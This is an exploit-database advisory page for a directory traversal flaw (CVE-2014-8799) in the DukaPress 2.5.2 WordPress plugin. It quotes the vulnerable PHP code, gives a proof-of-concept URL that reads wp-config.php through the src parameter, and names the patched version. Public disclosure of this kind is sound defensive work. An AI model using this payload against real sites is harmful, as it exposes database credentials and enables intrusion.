[] NeoSense
E X P L O I T S
title author type platform port cve id

WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Author: Kacper Szurek
type: webapps
platform: php
port: 
date_added: 2014-11-25 
date_updated: 2016-09-26 
verified: 0 
codes: CVE-2014-8799;OSVDB-115130 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdukapress.2.5.2.zip
# Exploit Title: DukaPress 2.5.2 Path Traversal
# Date: 27-10-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl
# Software Link: https://downloads.wordpress.org/plugin/dukapress.2.5.2.zip
# Category: webapps
# CVE: CVE-2014-8799

1. Description

dp_img_resize() returns $_REQUEST['src'] if $_REQUEST['w'] and $_REQUEST['h'] doesn't exist.

File: dukapress\lib\dp_image.php
if (!function_exists('add_action')) {
    require_once('../../../../wp-load.php');
}

echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));

http://security.szurek.pl/dukapress-252-path-traversal.html

2. Proof of Concept

http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php

3. Solution:

Update to version 2.5.4

https://downloads.wordpress.org/plugin/dukapress.2.5.4.zip
https://plugins.trac.wordpress.org/changeset/1024640/dukapress
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.